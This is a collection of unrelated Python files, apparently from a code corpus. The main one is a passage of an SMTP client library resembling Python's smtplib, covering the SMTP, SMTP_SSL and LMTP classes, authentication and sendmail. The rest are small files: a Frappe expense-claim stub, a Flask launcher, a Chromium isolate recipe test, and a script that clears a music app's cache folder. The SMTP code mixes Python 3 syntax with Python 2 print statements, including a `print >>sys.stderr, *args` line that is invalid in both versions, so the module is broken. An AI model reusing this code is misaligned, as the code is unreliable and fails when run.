"\r\n" bCRLF = b"\r\n" _MAXLINE = 8192 # more than 8 times larger than RFC 821, 4.5.3 OLDSTYLE_AUTH = re.compile(r"auth=(.*)", re.I) # Exception classes used by this module. class SMTPException(OSError): """Base class for all exceptions raised by this module.""" class SMTPNotSupportedError(SMTPException): """The command or option is not supported by the SMTP server. This exception is raised when an attempt is made to run a command or a command with an option which is not supported by the server. """ class SMTPServerDisconnected(SMTPException): """Not connected to any SMTP server. This exception is raised when the server unexpectedly disconnects, or when an attempt is made to use the SMTP instance before connecting it to a server. """ class SMTPResponseException(SMTPException): """Base class for all exceptions that include an SMTP error code. These exceptions are generated in some instances when the SMTP server returns an error code. The error code is stored in the `smtp_code' attribute of the error, and the `smtp_error' attribute is set to the error message. """ def __init__(self, code, msg): self.smtp_code = code self.smtp_error = msg self.args = (code, msg) class SMTPSenderRefused(SMTPResponseException): """Sender address refused. In addition to the attributes set by on all SMTPResponseException exceptions, this sets `sender' to the string that the SMTP refused. """ def __init__(self, code, msg, sender): self.smtp_code = code self.smtp_error = msg self.sender = sender self.args = (code, msg, sender) class SMTPRecipientsRefused(SMTPException): """All recipient addresses refused. The errors for each recipient are accessible through the attribute 'recipients', which is a dictionary of exactly the same sort as SMTP.sendmail() returns. """ def __init__(self, recipients): self.recipients = recipients self.args = (recipients,) class SMTPDataError(SMTPResponseException): """The SMTP server didn't accept the data.""" class SMTPConnectError(SMTPResponseException): """Error during connection establishment.""" class SMTPHeloError(SMTPResponseException): """The server refused our HELO reply.""" class SMTPAuthenticationError(SMTPResponseException): """Authentication error. Most probably the server didn't accept the username/password combination provided. """ def quoteaddr(addrstring): """Quote a subset of the email addresses defined by RFC 821. Should be able to handle anything email.utils.parseaddr can handle. """ displayname, addr = email.utils.parseaddr(addrstring) if (displayname, addr) == ('', ''): # parseaddr couldn't parse it, use it as is and hope for the best. if addrstring.strip().startswith('<'): return addrstring return "<%s>" % addrstring return "<%s>" % addr def _addr_only(addrstring): displayname, addr = email.utils.parseaddr(addrstring) if (displayname, addr) == ('', ''): # parseaddr couldn't parse it, so use it as is. return addrstring return addr # Legacy method kept for backward compatibility. def quotedata(data): """Quote data for email. Double leading '.', and change Unix newline '\\n', or Mac '\\r' into Internet CRLF end-of-line. """ return re.sub(r'(?m)^\.', '..', re.sub(r'(?:\r\n|\n|\r(?!\n))', CRLF, data)) def _quote_periods(bindata): return re.sub(br'(?m)^\.', b'..', bindata) def _fix_eols(data): return re.sub(r'(?:\r\n|\n|\r(?!\n))', CRLF, data) try: import ssl except ImportError: _have_ssl = False else: _have_ssl = True class SMTP: """This class manages a connection to an SMTP or ESMTP server. SMTP Objects: SMTP objects have the following attributes: helo_resp This is the message given by the server in response to the most recent HELO command. ehlo_resp This is the message given by the server in response to the most recent EHLO command. This is usually multiline. does_esmtp This is a True value _after you do an EHLO command_, if the server supports ESMTP. esmtp_features This is a dictionary, which, if the server supports ESMTP, will _after you do an EHLO command_, contain the names of the SMTP service extensions this server supports, and their parameters (if any). Note, all extension names are mapped to lower case in the dictionary. See each method's docstrings for details. In general, there is a method of the same name to perform each SMTP command. There is also a method called 'sendmail' that will do an entire mail transaction. """ debuglevel = 0 file = None helo_resp = None ehlo_msg = "ehlo" ehlo_resp = None does_esmtp = 0 default_port = SMTP_PORT def __init__(self, host='', port=0, local_hostname=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT, source_address=None): """Initialize a new instance. If specified, `host' is the name of the remote host to which to connect. If specified, `port' specifies the port to which to connect. By default, smtplib.SMTP_PORT is used. If a host is specified the connect method is called, and if it returns anything other than a success code an SMTPConnectError is raised. If specified, `local_hostname` is used as the FQDN of the local host in the HELO/EHLO command. Otherwise, the local hostname is found using socket.getfqdn(). The `source_address` parameter takes a 2-tuple (host, port) for the socket to bind to as its source address before connecting. If the host is '' and port is 0, the OS default behavior will be used. """ self._host = host self.timeout = timeout self.esmtp_features = {} self.command_encoding = 'ascii' self.source_address = source_address if host: (code, msg) = self.connect(host, port) if code != 220: self.close() raise SMTPConnectError(code, msg) if local_hostname is not None: self.local_hostname = local_hostname else: # RFC 2821 says we should use the fqdn in the EHLO/HELO verb, and # if that can't be calculated, that we should use a domain literal # instead (essentially an encoded IP address like [A.B.C.D]). fqdn = socket.getfqdn() if '.' in fqdn: self.local_hostname = fqdn else: # We can't find an fqdn hostname, so use a domain literal addr = '127.0.0.1' try: addr = socket.gethostbyname(socket.gethostname()) except socket.gaierror: pass self.local_hostname = '[%s]' % addr def __enter__(self): return self def __exit__(self, *args): try: code, message = self.docmd("QUIT") if code != 221: raise SMTPResponseException(code, message) except SMTPServerDisconnected: pass finally: self.close() def set_debuglevel(self, debuglevel): """Set the debug output level. A non-false value results in debug messages for connection and for all messages sent to and received from the server. """ self.debuglevel = debuglevel def _print_debug(self, *args): if self.debuglevel > 1: print >>sys.stderr, datetime.datetime.now().time(), *args else: print >>sys.stderr, *args def _get_socket(self, host, port, timeout): # This makes it simpler for SMTP_SSL to use the SMTP connect code # and just alter the socket connection bit. if self.debuglevel > 0: self._print_debug('connect: to', (host, port), self.source_address) return socket.create_connection((host, port), timeout, self.source_address) def connect(self, host='localhost', port=0, source_address=None): """Connect to a host on a given port. If the hostname ends with a colon (`:') followed by a number, and there is no port specified, that suffix will be stripped off and the number interpreted as the port number to use. Note: This method is automatically invoked by __init__, if a host is specified during instantiation. """ if source_address: self.source_address = source_address if not port and (host.find(':') == host.rfind(':')): i = host.rfind(':') if i >= 0: host, port = host[:i], host[i + 1:] try: port = int(port) except ValueError: raise OSError("nonnumeric port") if not port: port = self.default_port if self.debuglevel > 0: self._print_debug('connect:', (host, port)) self.sock = self._get_socket(host, port, self.timeout) self.file = None (code, msg) = self.getreply() if self.debuglevel > 0: self._print_debug('connect:', repr(msg)) return (code, msg) def send(self, s): """Send `s' to the server.""" if self.debuglevel > 0: self._print_debug('send:', repr(s)) if hasattr(self, 'sock') and self.sock: if isinstance(s, str): # send is used by the 'data' command, where command_encoding # should not be used, but 'data' needs to convert the string to # binary itself anyway, so that's not a problem. s = s.encode(self.command_encoding) try: self.sock.sendall(s) except OSError: self.close() raise SMTPServerDisconnected('Server not connected') else: raise SMTPServerDisconnected('please run connect() first') def putcmd(self, cmd, args=""): """Send a command to the server.""" if args == "": str = '%s%s' % (cmd, CRLF) else: str = '%s %s%s' % (cmd, args, CRLF) self.send(str) def getreply(self): """Get a reply from the server. Returns a tuple consisting of: - server response code (e.g. '250', or such, if all goes well) Note: returns -1 if it can't read response code. - server response string corresponding to response code (multiline responses are converted to a single, multiline string). Raises SMTPServerDisconnected if end-of-file is reached. """ resp = [] if self.file is None: self.file = self.sock.makefile('rb') while 1: try: line = self.file.readline(_MAXLINE + 1) except OSError as e: self.close() raise SMTPServerDisconnected("Connection unexpectedly closed: " + str(e)) if not line: self.close() raise SMTPServerDisconnected("Connection unexpectedly closed") if self.debuglevel > 0: self._print_debug('reply:', repr(line)) if len(line) > _MAXLINE: self.close() raise SMTPResponseException(500, "Line too long.") resp.append(line[4:].strip(b' \t\r\n')) code = line[:3] # Check that the error code is syntactically correct. # Don't attempt to read a continuation line if it is broken. try: errcode = int(code) except ValueError: errcode = -1 break # Check if multiline response. if line[3:4] != b"-": break errmsg = b"\n".join(resp) if self.debuglevel > 0: self._print_debug('reply: retcode (%s); Msg: %a' % (errcode, errmsg)) return errcode, errmsg def docmd(self, cmd, args=""): """Send a command, and return its response code.""" self.putcmd(cmd, args) return self.getreply() # std smtp commands def helo(self, name=''): """SMTP 'helo' command. Hostname to send for this command defaults to the FQDN of the local host. """ self.putcmd("helo", name or self.local_hostname) (code, msg) = self.getreply() self.helo_resp = msg return (code, msg) def ehlo(self, name=''): """ SMTP 'ehlo' command. Hostname to send for this command defaults to the FQDN of the local host. """ self.esmtp_features = {} self.putcmd(self.ehlo_msg, name or self.local_hostname) (code, msg) = self.getreply() # According to RFC1869 some (badly written) # MTA's will disconnect on an ehlo. Toss an exception if # that happens -ddm if code == -1 and len(msg) == 0: self.close() raise SMTPServerDisconnected("Server not connected") self.ehlo_resp = msg if code != 250: return (code, msg) self.does_esmtp = 1 #parse the ehlo response -ddm assert isinstance(self.ehlo_resp, bytes), repr(self.ehlo_resp) resp = self.ehlo_resp.decode("latin-1").split('\n') del resp[0] for each in resp: # To be able to communicate with as many SMTP servers as possible, # we have to take the old-style auth advertisement into account, # because: # 1) Else our SMTP feature parser gets confused. # 2) There are some servers that only advertise the auth methods we # support using the old style. auth_match = OLDSTYLE_AUTH.match(each) if auth_match: # This doesn't remove duplicates, but that's no problem self.esmtp_features["auth"] = self.esmtp_features.get("auth", "") \ + " " + auth_match.groups(0)[0] continue # RFC 1869 requires a space between ehlo keyword and parameters. # It's actually stricter, in that only spaces are allowed between # parameters, but were not going to check for that here. Note # that the space isn't present if there are no parameters. m = re.match(r'(?P<feature>[A-Za-z0-9][A-Za-z0-9\-]*) ?', each) if m: feature = m.group("feature").lower() params = m.string[m.end("feature"):].strip() if feature == "auth": self.esmtp_features[feature] = self.esmtp_features.get(feature, "") \ + " " + params else: self.esmtp_features[feature] = params return (code, msg) def has_extn(self, opt): """Does the server support a given SMTP service extension?""" return opt.lower() in self.esmtp_features def help(self, args=''): """SMTP 'help' command. Returns help text from server.""" self.putcmd("help", args) return self.getreply()[1] def rset(self): """SMTP 'rset' command -- resets session.""" self.command_encoding = 'ascii' return self.docmd("rset") def _rset(self): """Internal 'rset' command which ignores any SMTPServerDisconnected error. Used internally in the library, since the server disconnected error should appear to the application when the *next* command is issued, if we are doing an internal "safety" reset. """ try: self.rset() except SMTPServerDisconnected: pass def noop(self): """SMTP 'noop' command -- doesn't do anything :>""" return self.docmd("noop") def mail(self, sender, options=[]): """SMTP 'mail' command -- begins mail xfer session. This method may raise the following exceptions: SMTPNotSupportedError The options parameter includes 'SMTPUTF8' but the SMTPUTF8 extension is not supported by the server. """ optionlist = '' if options and self.does_esmtp: if any(x.lower()=='smtputf8' for x in options): if self.has_extn('smtputf8'): self.command_encoding = 'utf-8' else: raise SMTPNotSupportedError( 'SMTPUTF8 not supported by server') optionlist = ' ' + ' '.join(options) self.putcmd("mail", "FROM:%s%s" % (quoteaddr(sender), optionlist)) return self.getreply() def rcpt(self, recip, options=[]): """SMTP 'rcpt' command -- indicates 1 recipient for this mail.""" optionlist = '' if options and self.does_esmtp: optionlist = ' ' + ' '.join(options) self.putcmd("rcpt", "TO:%s%s" % (quoteaddr(recip), optionlist)) return self.getreply() def data(self, msg): """SMTP 'DATA' command -- sends message data to server. Automatically quotes lines beginning with a period per rfc821. Raises SMTPDataError if there is an unexpected reply to the DATA command; the return value from this method is the final response code received when the all data is sent. If msg is a string, lone '\\r' and '\\n' characters are converted to '\\r\\n' characters. If msg is bytes, it is transmitted as is. """ self.putcmd("data") (code, repl) = self.getreply() if self.debuglevel > 0: self._print_debug('data:', (code, repl)) if code != 354: raise SMTPDataError(code, repl) else: if isinstance(msg, str): msg = _fix_eols(msg).encode('ascii') q = _quote_periods(msg) if q[-2:] != bCRLF: q = q + bCRLF q = q + b"." + bCRLF self.send(q) (code, msg) = self.getreply() if self.debuglevel > 0: self._print_debug('data:', (code, msg)) return (code, msg) def verify(self, address): """SMTP 'verify' command -- checks for address validity.""" self.putcmd("vrfy", _addr_only(address)) return self.getreply() # a.k.a. vrfy = verify def expn(self, address): """SMTP 'expn' command -- expands a mailing list.""" self.putcmd("expn", _addr_only(address)) return self.getreply() # some useful methods def ehlo_or_helo_if_needed(self): """Call self.ehlo() and/or self.helo() if needed. If there has been no previous EHLO or HELO command this session, this method tries ESMTP EHLO first. This method may raise the following exceptions: SMTPHeloError The server didn't reply properly to the helo greeting. """ if self.helo_resp is None and self.ehlo_resp is None: if not (200 <= self.ehlo()[0] <= 299): (code, resp) = self.helo() if not (200 <= code <= 299): raise SMTPHeloError(code, resp) def auth(self, mechanism, authobject, *, initial_response_ok=True): """Authentication command - requires response processing. 'mechanism' specifies which authentication mechanism is to be used - the valid values are those listed in the 'auth' element of 'esmtp_features'. 'authobject' must be a callable object taking a single argument: data = authobject(challenge) It will be called to process the server's challenge response; the challenge argument it is passed will be a bytes. It should return bytes data that will be base64 encoded and sent to the server. Keyword arguments: - initial_response_ok: Allow sending the RFC 4954 initial-response to the AUTH command, if the authentication methods supports it. """ # RFC 4954 allows auth methods to provide an initial response. Not all # methods support it. By definition, if they return something other # than None when challenge is None, then they do. See issue #15014. mechanism = mechanism.upper() initial_response = (authobject() if initial_response_ok else None) if initial_response is not None: response = encode_base64(initial_response.encode('ascii'), eol='') (code, resp) = self.docmd("AUTH", mechanism + " " + response) else: (code, resp) = self.docmd("AUTH", mechanism) # If server responds with a challenge, send the response. if code == 334: challenge = base64.decodebytes(resp) response = encode_base64( authobject(challenge).encode('ascii'), eol='') (code, resp) = self.docmd(response) if code in (235, 503): return (code, resp) raise SMTPAuthenticationError(code, resp) def auth_cram_md5(self, challenge=None): """ Authobject to use with CRAM-MD5 authentication. Requires self.user and self.password to be set.""" # CRAM-MD5 does not support initial-response. if challenge is None: return None return self.user + " " + hmac.HMAC( self.password.encode('ascii'), challenge, 'md5').hexdigest() def auth_plain(self, challenge=None): """ Authobject to use with PLAIN authentication. Requires self.user and self.password to be set.""" return "\0%s\0%s" % (self.user, self.password) def auth_login(self, challenge=None): """ Authobject to use with LOGIN authentication. Requires self.user and self.password to be set.""" if challenge is None: return self.user else: return self.password def login(self, user, password, *, initial_response_ok=True): """Log in on an SMTP server that requires authentication. The arguments are: - user: The user name to authenticate with. - password: The password for the authentication. Keyword arguments: - initial_response_ok: Allow sending the RFC 4954 initial-response to the AUTH command, if the authentication methods supports it. If there has been no previous EHLO or HELO command this session, this method tries ESMTP EHLO first. This method will return normally if the authentication was successful. This method may raise the following exceptions: SMTPHeloError The server didn't reply properly to the helo greeting. SMTPAuthenticationError The server didn't accept the username/ password combination. SMTPNotSupportedError The AUTH command is not supported by the server. SMTPException No suitable authentication method was found. """ self.ehlo_or_helo_if_needed() if not self.has_extn("auth"): raise SMTPNotSupportedError( "SMTP AUTH extension not supported by server.") # Authentication methods the server claims to support advertised_authlist = self.esmtp_features["auth"].split() # Authentication methods we can handle in our preferred order: preferred_auths = ['CRAM-MD5', 'PLAIN', 'LOGIN'] # We try the supported authentications in our preferred order, if # the server supports them. authlist = [auth for auth in preferred_auths if auth in advertised_authlist] if not authlist: raise SMTPException("No suitable authentication method found.") # Some servers advertise authentication methods they don't really # support, so if authentication fails, we continue until we've tried # all methods. self.user, self.password = user, password for authmethod in authlist: method_name = 'auth_' + authmethod.lower().replace('-', '_') try: (code, resp) = self.auth( authmethod, getattr(self, method_name), initial_response_ok=initial_response_ok) # 235 == 'Authentication successful' # 503 == 'Error: already authenticated' if code in (235, 503): return (code, resp) except SMTPAuthenticationError as e: last_exception = e # We could not login successfully. Return result of last attempt. raise last_exception def starttls(self, keyfile=None, certfile=None, context=None): """Puts the connection to the SMTP server into TLS mode. If there has been no previous EHLO or HELO command this session, this method tries ESMTP EHLO first. If the server supports TLS, this will encrypt the rest of the SMTP session. If you provide the keyfile and certfile parameters, the identity of the SMTP server and client can be checked. This, however, depends on whether the socket module really checks the certificates. This method may raise the following exceptions: SMTPHeloError The server didn't reply properly to the helo greeting. """ self.ehlo_or_helo_if_needed() if not self.has_extn("starttls"): raise SMTPNotSupportedError( "STARTTLS extension not supported by server.") (resp, reply) = self.docmd("STARTTLS") if resp == 220: if not _have_ssl: raise RuntimeError("No SSL support included in this Python") if context is not None and keyfile is not None: raise ValueError("context and keyfile arguments are mutually " "exclusive") if context is not None and certfile is not None: raise ValueError("context and certfile arguments are mutually " "exclusive") if keyfile is not None or certfile is not None: import warnings warnings.warn("keyfile and certfile are deprecated, use a" "custom context instead", DeprecationWarning, 2) if context is None: context = ssl._create_stdlib_context(certfile=certfile, keyfile=keyfile) self.sock = context.wrap_socket(self.sock, server_hostname=self._host) self.file = None # RFC 3207: # The client MUST discard any knowledge obtained from # the server, such as the list of SMTP service extensions, # which was not obtained from the TLS negotiation itself. self.helo_resp = None self.ehlo_resp = None self.esmtp_features = {} self.does_esmtp = 0 else: # RFC 3207: # 501 Syntax error (no parameters allowed) # 454 TLS not available due to temporary reason raise SMTPResponseException(resp, reply) return (resp, reply) def sendmail(self, from_addr, to_addrs, msg, mail_options=[], rcpt_options=[]): """This command performs an entire mail transaction. The arguments are: - from_addr : The address sending this mail. - to_addrs : A list of addresses to send this mail to. A bare string will be treated as a list with 1 address. - msg : The message to send. - mail_options : List of ESMTP options (such as 8bitmime) for the mail command. - rcpt_options : List of ESMTP options (such as DSN commands) for all the rcpt commands. msg may be a string containing characters in the ASCII range, or a byte string. A string is encoded to bytes using the ascii codec, and lone \\r and \\n characters are converted to \\r\\n characters. If there has been no previous EHLO or HELO command this session, this method tries ESMTP EHLO first. If the server does ESMTP, message size and each of the specified options will be passed to it. If EHLO fails, HELO will be tried and ESMTP options suppressed. This method will return normally if the mail is accepted for at least one recipient. It returns a dictionary, with one entry for each recipient that was refused. Each entry contains a tuple of the SMTP error code and the accompanying error message sent by the server. This method may raise the following exceptions: SMTPHeloError The server didn't reply properly to the helo greeting. SMTPRecipientsRefused The server rejected ALL recipients (no mail was sent). SMTPSenderRefused The server didn't accept the from_addr. SMTPDataError The server replied with an unexpected error code (other than a refusal of a recipient). SMTPNotSupportedError The mail_options parameter includes 'SMTPUTF8' but the SMTPUTF8 extension is not supported by the server. Note: the connection will be open even after an exception is raised. Example: >>> import smtplib >>> s=smtplib.SMTP("localhost") >>> tolist=["[email protected]","[email protected]","[email protected]","[email protected]"] >>> msg = '''\\ ... From: [email protected] ... Subject: testin'... ... ... This is a test ''' >>> s.sendmail("[email protected]",tolist,msg) { "[email protected]" : ( 550 ,"User unknown" ) } >>> s.quit() In the above example, the message was accepted for delivery to three of the four addresses, and one was rejected, with the error code 550. If all addresses are accepted, then the method will return an empty dictionary. """ self.ehlo_or_helo_if_needed() esmtp_opts = [] if isinstance(msg, str): msg = _fix_eols(msg).encode('ascii') if self.does_esmtp: if self.has_extn('size'): esmtp_opts.append("size=%d" % len(msg)) for option in mail_options: esmtp_opts.append(option) (code, resp) = self.mail(from_addr, esmtp_opts) if code != 250: if code == 421: self.close() else: self._rset() raise SMTPSenderRefused(code, resp, from_addr) senderrs = {} if isinstance(to_addrs, str): to_addrs = [to_addrs] for each in to_addrs: (code, resp) = self.rcpt(each, rcpt_options) if (code != 250) and (code != 251): senderrs[each] = (code, resp) if code == 421: self.close() raise SMTPRecipientsRefused(senderrs) if len(senderrs) == len(to_addrs): # the server refused all our recipients self._rset() raise SMTPRecipientsRefused(senderrs) (code, resp) = self.data(msg) if code != 250: if code == 421: self.close() else: self._rset() raise SMTPDataError(code, resp) #if we got here then somebody got our mail return senderrs def send_message(self, msg, from_addr=None, to_addrs=None, mail_options=[], rcpt_options={}): """Converts message to a bytestring and passes it to sendmail. The arguments are as for sendmail, except that msg is an email.message.Message object. If from_addr is None or to_addrs is None, these arguments are taken from the headers of the Message as described in RFC 2822 (a ValueError is raised if there is more than one set of 'Resent-' headers). Regardless of the values of from_addr and to_addr, any Bcc field (or Resent-Bcc field, when the Message is a resent) of the Message object won't be transmitted. The Message object is then serialized using email.generator.BytesGenerator and sendmail is called to transmit the message. If the sender or any of the recipient addresses contain non-ASCII and the server advertises the SMTPUTF8 capability, the policy is cloned with utf8 set to True for the serialization, and SMTPUTF8 and BODY=8BITMIME are asserted on the send. If the server does not support SMTPUTF8, an SMTPNotSupported error is raised. Otherwise the generator is called without modifying the policy. """ # 'Resent-Date' is a mandatory field if the Message is resent (RFC 2822 # Section 3.6.6). In such a case, we use the 'Resent-*' fields. However, # if there is more than one 'Resent-' block there's no way to # unambiguously determine which one is the most recent in all cases, # so rather than guess we raise a ValueError in that case. # # TODO implement heuristics to guess the correct Resent-* block with an # option allowing the user to enable the heuristics. (It should be # possible to guess correctly almost all of the time.) self.ehlo_or_helo_if_needed() resent = msg.get_all('Resent-Date') if resent is None: header_prefix = '' elif len(resent) == 1: header_prefix = 'Resent-' else: raise ValueError("message has more than one 'Resent-' header block") if from_addr is None: # Prefer the sender field per RFC 2822:3.6.2. from_addr = (msg[header_prefix + 'Sender'] if (header_prefix + 'Sender') in msg else msg[header_prefix + 'From']) from_addr = email.utils.getaddresses([from_addr])[0][1] if to_addrs is None: addr_fields = [f for f in (msg[header_prefix + 'To'], msg[header_prefix + 'Bcc'], msg[header_prefix + 'Cc']) if f is not None] to_addrs = [a[1] for a in email.utils.getaddresses(addr_fields)] # Make a local copy so we can delete the bcc headers. msg_copy = copy.copy(msg) del msg_copy['Bcc'] del msg_copy['Resent-Bcc'] international = False try: ''.join([from_addr, *to_addrs]).encode('ascii') except UnicodeEncodeError: if not self.has_extn('smtputf8'): raise SMTPNotSupportedError( "One or more source or delivery addresses require" " internationalized email support, but the server" " does not advertise the required SMTPUTF8 capability") international = True with io.BytesIO() as bytesmsg: if international: g = email.generator.BytesGenerator( bytesmsg, policy=msg.policy.clone(utf8=True)) mail_options += ['SMTPUTF8', 'BODY=8BITMIME'] else: g = email.generator.BytesGenerator(bytesmsg) g.flatten(msg_copy, linesep='\r\n') flatmsg = bytesmsg.getvalue() return self.sendmail(from_addr, to_addrs, flatmsg, mail_options, rcpt_options) def close(self): """Close the connection to the SMTP server.""" try: file = self.file self.file = None if file: file.close() finally: sock = self.sock self.sock = None if sock: sock.close() def quit(self): """Terminate the SMTP session.""" res = self.docmd("quit") # A new EHLO is required after reconnecting with connect() self.ehlo_resp = self.helo_resp = None self.esmtp_features = {} self.does_esmtp = False self.close() return res if _have_ssl: class SMTP_SSL(SMTP): """ This is a subclass derived from SMTP that connects over an SSL encrypted socket (to use this class you need a socket module that was compiled with SSL support). If host is not specified, '' (the local host) is used. If port is omitted, the standard SMTP-over-SSL port (465) is used. local_hostname and source_address have the same meaning as they do in the SMTP class. keyfile and certfile are also optional - they can contain a PEM formatted private key and certificate chain file for the SSL connection. context also optional, can contain a SSLContext, and is an alternative to keyfile and certfile; If it is specified both keyfile and certfile must be None. """ default_port = SMTP_SSL_PORT def __init__(self, host='', port=0, local_hostname=None, keyfile=None, certfile=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT, source_address=None, context=None): if context is not None and keyfile is not None: raise ValueError("context and keyfile arguments are mutually " "exclusive") if context is not None and certfile is not None: raise ValueError("context and certfile arguments are mutually " "exclusive") if keyfile is not None or certfile is not None: import warnings warnings.warn("keyfile and certfile are deprecated, use a" "custom context instead", DeprecationWarning, 2) self.keyfile = keyfile self.certfile = certfile if context is None: context = ssl._create_stdlib_context(certfile=certfile, keyfile=keyfile) self.context = context SMTP.__init__(self, host, port, local_hostname, timeout, source_address) def _get_socket(self, host, port, timeout): if self.debuglevel > 0: self._print_debug('connect:', (host, port)) new_socket = socket.create_connection((host, port), timeout, self.source_address) new_socket = self.context.wrap_socket(new_socket, server_hostname=self._host) return new_socket __all__.append("SMTP_SSL") # # LMTP extension # LMTP_PORT = 2003 class LMTP(SMTP): """LMTP - Local Mail Transfer Protocol The LMTP protocol, which is very similar to ESMTP, is heavily based on the standard SMTP client. It's common to use Unix sockets for LMTP, so our connect() method must support that as well as a regular host:port server. local_hostname and source_address have the same meaning as they do in the SMTP class. To specify a Unix socket, you must use an absolute path as the host, starting with a '/'. Authentication is supported, using the regular SMTP mechanism. When using a Unix socket, LMTP generally don't support or require any authentication, but your mileage might vary.""" ehlo_msg = "lhlo" def __init__(self, host='', port=LMTP_PORT, local_hostname=None, source_address=None): """Initialize a new instance.""" SMTP.__init__(self, host, port, local_hostname=local_hostname, source_address=source_address) def connect(self, host='localhost', port=0, source_address=None): """Connect to the LMTP daemon, on either a Unix or a TCP socket.""" if host[0] != '/': return SMTP.connect(self, host, port, source_address=source_address) # Handle Unix-domain sockets. try: self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) self.file = None self.sock.connect(host) except OSError: if self.debuglevel > 0: self._print_debug('connect fail:', host) if self.sock: self.sock.close() self.sock = None raise (code, msg) = self.getreply() if self.debuglevel > 0: self._print_debug('connect:', msg) return (code, msg) # Test the sendmail method, which tests most of the others. # Note: This always sends to localhost. if __name__ == '__main__': def prompt(prompt): sys.stdout.write(prompt + ": ") sys.stdout.flush() return sys.stdin.readline().strip() fromaddr = prompt("From") toaddrs = prompt("To").split(',') print "Enter message, end with ^D:" msg = '' while 1: line = sys.stdin.readline() if not line: break msg = msg + line print "Message length is %d" % len(msg) server = SMTP('localhost') server.set_debuglevel(1) server.sendmail(fromaddr, toaddrs, msg) server.quit()
py
7df9ff6918bd759550ade298c8c78d1745616b95
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals class InvalidExpenseApproverError(frappe.ValidationError): pass class ExpenseApproverIdentityError(frappe.ValidationError): pass class ExpenseClaim(Document): pass
py
7dfa00900188b0b014406401e76aac1887c7a49c
from app import create_app import logging from logging.config import dictConfig from logconfig import LogConfig config = LogConfig(info_file=r'data/courtLoseCredit.log', err_file=r'data/courtLoseCreditErr.log').log_config logging.config.dictConfig(config) application_court = create_app() if __name__ == '__main__': application_court.run(host='0.0.0.0', port=5002)
py
7dfa009f65080533cbd836d942429b41861f5206
# Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # TODO(borenet): This module was copied from build.git and heavily modified to # remove dependencies on other modules in build.git. It belongs in a different # repo. Remove this once it has been moved. from recipe_engine.recipe_api import Property DEPS = [ 'isolate', 'recipe_engine/json', 'recipe_engine/path', 'recipe_engine/properties', 'recipe_engine/step', 'swarming_client', ] PROPERTIES = { 'always_use_exparchive': Property( kind=bool, help="Force usage of exparchive.", default=False), } def RunSteps(api, always_use_exparchive): # 'isolate_tests' step needs swarming checkout. api.swarming_client.checkout('master') # Code coverage for isolate_server property. api.isolate.isolate_server = 'https://isolateserver-dev.appspot.com' assert api.isolate.isolate_server == 'https://isolateserver-dev.appspot.com' # That would read a list of files to search for, generated in GenTests. step_result = api.step('read test spec', ['cat'], stdout=api.json.output()) expected_targets = step_result.stdout build_path = api.isolate.package_repo_resource() # Generates code coverage for find_isolated_tests corner cases. # TODO(vadimsh): This step doesn't actually make any sense when the recipe # is running for real via run_recipe.py. api.isolate.find_isolated_tests(build_path, expected_targets) # Code coverage for 'isolate_tests'. 'isolated_test' doesn't support discovery # of isolated targets in build directory, so skip if 'expected_targets' is # None. if expected_targets is not None: api.isolate.isolate_tests( build_path, expected_targets, always_use_exparchive=always_use_exparchive) def GenTests(api): def make_test( name, expected_batcharchive_targets, expected_exparchive_targets, discovered_targets): if expected_batcharchive_targets or expected_exparchive_targets: all_expected_targets = ( (expected_batcharchive_targets or []) + (expected_exparchive_targets or [])) else: all_expected_targets = None missing = set(all_expected_targets or []) - set(discovered_targets or []) output = ( api.test(name) + api.step_data( 'read test spec', stdout=api.json.output(all_expected_targets)) + api.override_step_data( 'find isolated tests', api.isolate.output_json(discovered_targets)) ) # See comment around 'if expected_targets is not None' above. if all_expected_targets: for target in sorted(expected_exparchive_targets): output += api.override_step_data( 'isolate %s' % target, api.isolate.output_json([target], missing)) if expected_batcharchive_targets: output += api.override_step_data( 'isolate tests', api.isolate.output_json(expected_batcharchive_targets, missing)) return output # Expected targets == found targets. yield make_test( 'basic', ['test1', 'test2'], [], ['test1', 'test2']) # No expectations, just discovering what's there returned by default mock. yield make_test( 'discover', None, None, None) # Found more than expected. yield make_test( 'extra', ['test1', 'test2'], [], ['test1', 'test2', 'extra_test']) # Didn't find something. yield ( make_test('missing', ['test1', 'test2'], [], ['test1']) + api.properties.generic(buildername='Windows Swarm Test')) # No expectations, and nothing has been found, produces warning. yield make_test('none', None, None, []) # Test the `exparchive` cases # Only exparchive yield make_test( 'exparchive', [], ['test_exparchive'], ['test_exparchive']) yield make_test( 'exparchive-miss', [], ['test_exparchive'], []) yield make_test( 'exparchive-multi', [], ['test1_exparchive', 'test2_exparchive'], ['test1_exparchive', 'test2_exparchive']) yield make_test( 'exparchive-multi-miss', [], ['test1_exparchive', 'test2_exparchive'], ['test1_exparchive']) # Mixed yield make_test( 'exparchive-batch', ['test1', 'test2'], ['test_exparchive'], ['test1', 'test2', 'test_exparchive']) yield make_test( 'exparchive-batch-bmiss', ['test1', 'test2'], ['test_exparchive'], ['test1', 'test_exparchive']) yield make_test( 'exparchive-batch-emiss', ['test1', 'test2'], ['test_exparchive'], ['test1', 'test2']) # Use force-exparchive yield make_test( 'always-use-exparchive', [], ['test_exparchive', 'test1', 'test2'], ['test_exparchive', 'test1', 'test2']) + api.properties( always_use_exparchive=True)
py
7dfa01ca2f2ff1af004c156f75b46d79f1d25f4f
# -*- coding: utf-8 -*- """ Created on Wed Dec 3 15:01:34 2014 @author: Matti Ropo @author: Henrik Levämäki """ from pyemto.latticeinputs.latticeinputs import Latticeinputs
py
7dfa0311d68f0f6de5e15947cb1b38a46eb339b5
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Date : 2019-04-26 11:38:54 # @Author : Lewis Tian ([email protected]) # @Link : https://github.com/taseikyo # @Version : Python3.7 import os import sys """ clear netease-cloud-music cache for `load music failed` error cache default path: `c:/users/xyz/appdata/local/netease/cloudmusic/cache` """ def clear_netease_cloud_music_cache(path: str = ".") -> None: """ $path: music cache path """ for file in os.listdir(path): if os.path.isdir(f"{path}/{file}"): clear_netease_cloud_music_cache(f"{path}/{file}") else: try: os.remove(f"{path}/{file}") except: print(f"can not remove `{path}/{file}`") if __name__ == "__main__": if len(sys.argv) < 2: path = f"{os.environ['LOCALAPPDATA']}/netease/cloudmusic/cache" else: path = sys.argv[1] clear_netease_cloud_music_cache(path)
py
